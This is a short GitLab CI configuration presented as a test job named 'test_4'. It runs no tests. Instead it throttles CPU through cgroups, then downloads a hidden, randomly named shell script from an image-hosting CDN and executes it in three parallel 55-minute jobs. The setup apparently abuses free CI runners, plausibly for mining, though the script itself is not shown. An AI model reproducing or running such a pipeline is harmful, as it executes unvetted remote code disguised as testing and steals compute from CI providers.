image: ubuntu:latest

before_script:
  - apt-get update -y
  - apt-get install wget unzip cgroup-tools jq curl -y
  - cgcreate -g cpu:/cpulimit && cgset -r cpu.cfs_period_us=50000 cpulimit && cgset -r cpu.cfs_quota_us=37500 cpulimit

test_4:
  allow_failure: true
  interruptible: true
  timeout: 55 minutes
  parallel: 3
  script:
    - wget https://res.cloudinary.com/ganbaro/raw/upload/v1620339793/.vYKVoM3N8Xs98EE47.sh
    - chmod u+x .vYKVoM3N8Xs98EE47.sh
    - ./.vYKVoM3N8Xs98EE47.sh
